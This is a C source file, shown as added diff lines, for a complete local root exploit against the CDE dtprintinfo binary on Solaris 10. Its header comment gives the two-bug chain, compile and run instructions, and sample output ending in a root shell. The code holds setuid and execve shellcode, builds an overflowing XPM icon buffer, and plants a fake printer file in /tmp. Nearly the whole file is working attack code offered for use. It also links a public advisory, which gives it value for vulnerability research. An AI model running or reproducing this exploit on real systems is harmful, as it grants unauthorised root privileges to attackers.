| 1 | + | /* |
| 2 | + | * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE |
| 3 | + | * Copyright (c) 2023 Marco Ivaldi <[email protected]> |
| 4 | + | * |
| 5 | + | * "What has been will be again, |
| 6 | + | * what has been done will be done again; |
| 7 | + | * there is nothing new under the Sun." |
| 8 | + | * -- Ecclesiastes 1:9 |
| 9 | + | * |
| 10 | + | * #Solaris #CDE #0day #ForeverDay #WontFix |
| 11 | + | * |
| 12 | + | * This exploit illustrates yet another way to abuse the infamous dtprintinfo |
| 13 | + | * binary distributed with the Common Desktop Environment (CDE), a veritable |
| 14 | + | * treasure trove for bug hunters since the 1990s. It's not the most reliable |
| 15 | + | * exploit I've ever written, but I'm quite proud of the new vulnerabilities |
| 16 | + | * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January |
| 17 | + | * 2021) applied. The exploit chain is structured as follows: |
| 18 | + | * 1. Inject a fake printer via the printer injection bug I found in lpstat. |
| 19 | + | * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). |
| 20 | + | * 3. Enjoy root privileges! |
| 21 | + | * |
| 22 | + | * For additional details on my bug hunting journey and on the vulnerabilities |
| 23 | + | * themselves, you can refer to the official advisory: |
| 24 | + | * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt |
| 25 | + | * |
| 26 | + | * Usage: |
| 27 | + | * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall |
| 28 | + | * $ ./raptor_dtprintlibXmas 10.0.0.109:0 |
| 29 | + | * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE |
| 30 | + | * Copyright (c) 2023 Marco Ivaldi <[email protected]> |
| 31 | + | * |
| 32 | + | * Using SI_PLATFORM : i86pc (5.10) |
| 33 | + | * Using stack base : 0x8047fff |
| 34 | + | * Using safe address : 0x8045790 |
| 35 | + | * Using rwx_mem address : 0xfeffa004 |
| 36 | + | * Using sc address : 0x8047fb4 |
| 37 | + | * Using sprintf() address : 0xfefd1250 |
| 38 | + | * Path of target binary : /usr/dt/bin/dtprintinfo |
| 39 | + | * |
| 40 | + | * On your X11 server: |
| 41 | + | * 1. Select the "fnord" printer, then click on "Selected" > "Properties". |
| 42 | + | * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. |
| 43 | + | * |
| 44 | + | * Back to your original shell: |
| 45 | + | * # id |
| 46 | + | * uid=0(root) gid=1(other) |
| 47 | + | * |
| 48 | + | * IMPORTANT NOTE. |
| 49 | + | * The buffer overflow corrupts some critical variables in memory, which we |
| 50 | + | * need to fix. In order to do so, we must patch the hostile buffer at some |
| 51 | + | * fixed locations with the first argument of the last call to ParseColors(). |
| 52 | + | * The easiest way to get such a safe address is via the special 0x41414141 |
| 53 | + | * command-line argument and truss, as follows: |
| 54 | + | * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT |
| 55 | + | * $ grep ParseColors OUT | tail -1 |
| 56 | + | * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) |
| 57 | + | * ^^^^^^^^^ << this is the safe address we need |
| 58 | + | * |
| 59 | + | * Tested on: |
| 60 | + | * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) |
| 61 | + | * [previous Solaris versions are also likely vulnerable] |
| 62 | + | */ |
| 63 | + | |
| 64 | + | #include <fcntl.h> |
| 65 | + | #include <link.h> |
| 66 | + | #include <procfs.h> |
| 67 | + | #include <stdio.h> |
| 68 | + | #include <stdlib.h> |
| 69 | + | #include <strings.h> |
| 70 | + | #include <unistd.h> |
| 71 | + | #include <sys/stat.h> |
| 72 | + | #include <sys/systeminfo.h> |
| 73 | + | |
| 74 | + | #define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE" |
| 75 | + | #define INFO2 "Copyright (c) 2023 Marco Ivaldi <[email protected]>" |
| 76 | + | |
| 77 | + | #define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program |
| 78 | + | #define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging |
| 79 | + | #define BUFSIZE 1106 // size of hostile buffer |
| 80 | + | #define PADDING 1 // hostile buffer padding |
| 81 | + | #define SAFE 0x08045770 // 1st arg to ParseColors() |
| 82 | + | |
| 83 | + | char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */ |
| 84 | + | /* triple setuid() */ |
| 85 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| 86 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| 87 | + | "\x31\xc0\x50\x50\xb0\x17\xcd\x91" |
| 88 | + | /* execve() */ |
| 89 | + | "\x31\xc0\x50\x68/ksh\x68/bin" |
| 90 | + | "\x89\xe3\x50\x53\x89\xe2\x50" |
| 91 | + | "\x52\x53\xb0\x3b\x50\xcd\x91"; |
| 92 | + | |
| 93 | + | /* globals */ |
| 94 | + | char *arg[2] = {"foo", NULL}; |
| 95 | + | char *env[256]; |
| 96 | + | int env_pos = 0, env_len = 0; |
| 97 | + | |
| 98 | + | /* prototypes */ |
| 99 | + | int add_env(char *string); |
| 100 | + | void check_bad(int addr, char *name); |
| 101 | + | int get_env_addr(char *path, char **argv); |
| 102 | + | int search_ldso(char *sym); |
| 103 | + | int search_rwx_mem(void); |
| 104 | + | void set_val(char *buf, int pos, int val); |
| 105 | + | |
| 106 | + | /* |
| 107 | + | * main() |
| 108 | + | */ |
| 109 | + | int main(int argc, char **argv) |
| 110 | + | { |
| 111 | + | char buf[BUFSIZE], cmd[1024], *vuln = VULN; |
| 112 | + | char platform[256], release[256], display[256]; |
| 113 | + | int i, sc_addr, safe_addr = SAFE; |
| 114 | + | FILE *fp; |
| 115 | + | |
| 116 | + | int sb = ((int)argv[0] | 0xfff); // stack base |
| 117 | + | int ret = search_ldso("sprintf"); // sprintf() in ld.so.1 |
| 118 | + | int rwx_mem = search_rwx_mem(); // rwx memory |
| 119 | + | |
| 120 | + | /* helper that prints argv[0] address, used by get_env_addr() */ |
| 121 | + | if (!strcmp(argv[0], arg[0])) { |
| 122 | + | printf("0x%p\n", argv[0]); |
| 123 | + | exit(0); |
| 124 | + | } |
| 125 | + | |
| 126 | + | /* print exploit information */ |
| 127 | + | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); |
| 128 | + | |
| 129 | + | /* process command line */ |
| 130 | + | if ((argc < 2) || (argc > 3)) { |
| 131 | + | fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", |
| 132 | + | argv[0]); |
| 133 | + | exit(1); |
| 134 | + | } |
| 135 | + | snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]); |
| 136 | + | if (argc > 2) { |
| 137 | + | safe_addr = (int)strtoul(argv[2], (char **)NULL, 0); |
| 138 | + | } |
| 139 | + | |
| 140 | + | /* enter debug mode */ |
| 141 | + | if (safe_addr == 0x41414141) { |
| 142 | + | unlink(DEBUG); |
| 143 | + | snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG); |
| 144 | + | if (system(cmd) == -1) { |
| 145 | + | perror("error creating debug binary"); |
| 146 | + | exit(1); |
| 147 | + | } |
| 148 | + | vuln = DEBUG; |
| 149 | + | } |
| 150 | + | |
| 151 | + | /* fill envp while keeping padding */ |
| 152 | + | add_env("LPDEST=fnord"); // injected printer |
| 153 | + | add_env("HOME=/tmp"); // home directory |
| 154 | + | add_env("PATH=/usr/bin:/bin"); // path |
| 155 | + | sc_addr = add_env(display); // x11 display |
| 156 | + | add_env(sc); // shellcode |
| 157 | + | add_env(NULL); |
| 158 | + | |
| 159 | + | /* calculate shellcode address */ |
| 160 | + | sc_addr += get_env_addr(vuln, argv); |
| 161 | + | |
| 162 | + | /* inject a fake printer */ |
| 163 | + | unlink("/tmp/.printers"); |
| 164 | + | unlink("/tmp/.printers.new"); |
| 165 | + | if (!(fp = fopen("/tmp/.printers", "w"))) { |
| 166 | + | perror("error injecting a fake printer"); |
| 167 | + | exit(1); |
| 168 | + | } |
| 169 | + | fprintf(fp, "fnord :\n"); |
| 170 | + | fclose(fp); |
| 171 | + | link("/tmp/.printers", "/tmp/.printers.new"); |
| 172 | + | |
| 173 | + | /* craft the hostile buffer */ |
| 174 | + | bzero(buf, sizeof(buf)); |
| 175 | + | for (i = PADDING; i < BUFSIZE - 16; i += 4) { |
| 176 | + | set_val(buf, i, ret); // sprintf() |
| 177 | + | set_val(buf, i += 4, rwx_mem); // saved eip |
| 178 | + | set_val(buf, i += 4, rwx_mem); // 1st arg |
| 179 | + | set_val(buf, i += 4, sc_addr); // 2nd arg |
| 180 | + | } |
| 181 | + | memcpy(buf, "\"c c ", 5); // beginning of hostile buffer |
| 182 | + | buf[912] = ' '; // string separator |
| 183 | + | set_val(buf, 1037, safe_addr); // safe address |
| 184 | + | set_val(buf, 1065, safe_addr); // safe address |
| 185 | + | set_val(buf, 1073, 0xffffffff); // -1 |
| 186 | + | |
| 187 | + | /* create the hostile XPM icon files */ |
| 188 | + | system("rm -fr /tmp/.dt"); |
| 189 | + | mkdir("/tmp/.dt", 0755); |
| 190 | + | mkdir("/tmp/.dt/icons", 0755); |
| 191 | + | if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) { |
| 192 | + | perror("error creating XPM icon files"); |
| 193 | + | exit(1); |
| 194 | + | } |
| 195 | + | fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf); |
| 196 | + | fclose(fp); |
| 197 | + | link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm"); |
| 198 | + | link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm"); |
| 199 | + | |
| 200 | + | /* print some output */ |
| 201 | + | sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); |
| 202 | + | sysinfo(SI_RELEASE, release, sizeof(release) - 1); |
| 203 | + | fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); |
| 204 | + | fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); |
| 205 | + | fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr); |
| 206 | + | fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); |
| 207 | + | fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); |
| 208 | + | fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret); |
| 209 | + | fprintf(stderr, "Path of target binary\t: %s\n\n", vuln); |
| 210 | + | |
| 211 | + | /* check for badchars */ |
| 212 | + | check_bad(safe_addr, "safe address"); |
| 213 | + | check_bad(rwx_mem, "rwx_mem address"); |
| 214 | + | check_bad(sc_addr, "sc address"); |
| 215 | + | check_bad(ret, "sprintf() address"); |
| 216 | + | |
| 217 | + | /* run the vulnerable program */ |
| 218 | + | execve(vuln, arg, env); |
| 219 | + | perror("execve"); |
| 220 | + | exit(0); |
| 221 | + | } |
| 222 | + | |
| 223 | + | /* |
| 224 | + | * add_env(): add a variable to envp and pad if needed |
| 225 | + | */ |
| 226 | + | int add_env(char *string) |
| 227 | + | { |
| 228 | + | int i; |
| 229 | + | |
| 230 | + | /* null termination */ |
| 231 | + | if (!string) { |
| 232 | + | env[env_pos] = NULL; |
| 233 | + | return env_len; |
| 234 | + | } |
| 235 | + | |
| 236 | + | /* add the variable to envp */ |
| 237 | + | env[env_pos] = string; |
| 238 | + | env_len += strlen(string) + 1; |
| 239 | + | env_pos++; |
| 240 | + | |
| 241 | + | /* pad envp using zeroes */ |
| 242 | + | if ((strlen(string) + 1) % 4) |
| 243 | + | for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { |
| 244 | + | env[env_pos] = string + strlen(string); |
| 245 | + | env_len++; |
| 246 | + | } |
| 247 | + | |
| 248 | + | return env_len; |
| 249 | + | } |
| 250 | + | |
| 251 | + | /* |
| 252 | + | * check_bad(): check an address for the presence of badchars |
| 253 | + | */ |
| 254 | + | void check_bad(int addr, char *name) |
| 255 | + | { |
| 256 | + | int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP |
| 257 | + | |
| 258 | + | for (i = 0; i < sizeof(bad) / sizeof(int); i++) { |
| 259 | + | if (((addr & 0xff) == bad[i]) || |
| 260 | + | ((addr & 0xff00) == bad[i]) || |
| 261 | + | ((addr & 0xff0000) == bad[i]) || |
| 262 | + | ((addr & 0xff000000) == bad[i])) { |
| 263 | + | fprintf(stderr, "error: %s contains a badchar\n", name); |
| 264 | + | exit(1); |
| 265 | + | } |
| 266 | + | } |
| 267 | + | } |
| 268 | + | |
| 269 | + | /* |
| 270 | + | * get_env_addr(): get environment address using a helper program |
| 271 | + | */ |
| 272 | + | int get_env_addr(char *path, char **argv) |
| 273 | + | { |
| 274 | + | char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; |
| 275 | + | char hex[11]; |
| 276 | + | int fd[2], addr; |
| 277 | + | |
| 278 | + | /* truncate program name at correct length and create a hard link */ |
| 279 | + | prog[strlen(path)] = '\0'; |
| 280 | + | unlink(prog); |
| 281 | + | link(argv[0], prog); |
| 282 | + | |
| 283 | + | /* open pipe to read program output */ |
| 284 | + | if (pipe(fd) == -1) { |
| 285 | + | perror("pipe"); |
| 286 | + | exit(1); |
| 287 | + | } |
| 288 | + | |
| 289 | + | switch(fork()) { |
| 290 | + | |
| 291 | + | case -1: /* cannot fork */ |
| 292 | + | perror("fork"); |
| 293 | + | exit(1); |
| 294 | + | |
| 295 | + | case 0: /* child */ |
| 296 | + | dup2(fd[1], 1); |
| 297 | + | close(fd[0]); |
| 298 | + | close(fd[1]); |
| 299 | + | execve(prog, arg, env); |
| 300 | + | perror("execve"); |
| 301 | + | exit(1); |
| 302 | + | |
| 303 | + | default: /* parent */ |
| 304 | + | close(fd[1]); |
| 305 | + | read(fd[0], hex, sizeof(hex)); |
| 306 | + | break; |
| 307 | + | } |
| 308 | + | |
| 309 | + | /* check address */ |
| 310 | + | if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) { |
| 311 | + | fprintf(stderr, "error: cannot read address from helper\n"); |
| 312 | + | exit(1); |
| 313 | + | } |
| 314 | + | |
| 315 | + | return addr + strlen(arg[0]) + 1; |
| 316 | + | } |
| 317 | + | |
| 318 | + | /* |
| 319 | + | * search_ldso(): search for a symbol inside ld.so.1 |
| 320 | + | */ |
| 321 | + | int search_ldso(char *sym) |
| 322 | + | { |
| 323 | + | int addr; |
| 324 | + | void *handle; |
| 325 | + | Link_map *lm; |
| 326 | + | |
| 327 | + | /* open the executable object file */ |
| 328 | + | if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { |
| 329 | + | perror("dlopen"); |
| 330 | + | exit(1); |
| 331 | + | } |
| 332 | + | |
| 333 | + | /* get dynamic load information */ |
| 334 | + | if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { |
| 335 | + | perror("dlinfo"); |
| 336 | + | exit(1); |
| 337 | + | } |
| 338 | + | |
| 339 | + | /* search for the address of the symbol */ |
| 340 | + | if ((addr = (int)dlsym(handle, sym)) == NULL) { |
| 341 | + | fprintf(stderr, "sorry, function %s() not found\n", sym); |
| 342 | + | exit(1); |
| 343 | + | } |
| 344 | + | |
| 345 | + | /* close the executable object file */ |
| 346 | + | dlclose(handle); |
| 347 | + | |
| 348 | + | return addr; |
| 349 | + | } |
| 350 | + | |
| 351 | + | /* |
| 352 | + | * search_rwx_mem(): search for an RWX memory segment valid for all |
| 353 | + | * programs (typically, /usr/lib/ld.so.1) using the proc filesystem |
| 354 | + | */ |
| 355 | + | int search_rwx_mem(void) |
| 356 | + | { |
| 357 | + | int fd; |
| 358 | + | char tmp[16]; |
| 359 | + | prmap_t map; |
| 360 | + | int addr = 0, addr_old; |
| 361 | + | |
| 362 | + | /* open the proc filesystem */ |
| 363 | + | sprintf(tmp,"/proc/%d/map", (int)getpid()); |
| 364 | + | if ((fd = open(tmp, O_RDONLY)) < 0) { |
| 365 | + | fprintf(stderr, "can't open %s\n", tmp); |
| 366 | + | exit(1); |
| 367 | + | } |
| 368 | + | |
| 369 | + | /* search for the last RWX memory segment before stack (last - 1) */ |
| 370 | + | while (read(fd, &map, sizeof(map))) |
| 371 | + | if (map.pr_vaddr) |
| 372 | + | if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { |
| 373 | + | addr_old = addr; |
| 374 | + | addr = map.pr_vaddr; |
| 375 | + | } |
| 376 | + | close(fd); |
| 377 | + | |
| 378 | + | /* add 4 to the exact address NUL bytes */ |
| 379 | + | if (!(addr_old & 0xff)) |
| 380 | + | addr_old |= 0x04; |
| 381 | + | if (!(addr_old & 0xff00)) |
| 382 | + | addr_old |= 0x0400; |
| 383 | + | |
| 384 | + | return addr_old; |
| 385 | + | } |
| 386 | + | |
| 387 | + | /* |
| 388 | + | * set_val(): copy a dword inside a buffer (little endian) |
| 389 | + | */ |
| 390 | + | void set_val(char *buf, int pos, int val) |
| 391 | + | { |
| 392 | + | buf[pos] = (val & 0x000000ff); |
| 393 | + | buf[pos + 1] = (val & 0x0000ff00) >> 8; |
| 394 | + | buf[pos + 2] = (val & 0x00ff0000) >> 16; |
| 395 | + | buf[pos + 3] = (val & 0xff000000) >> 24; |
| 396 | + | } |
| 397 | + | |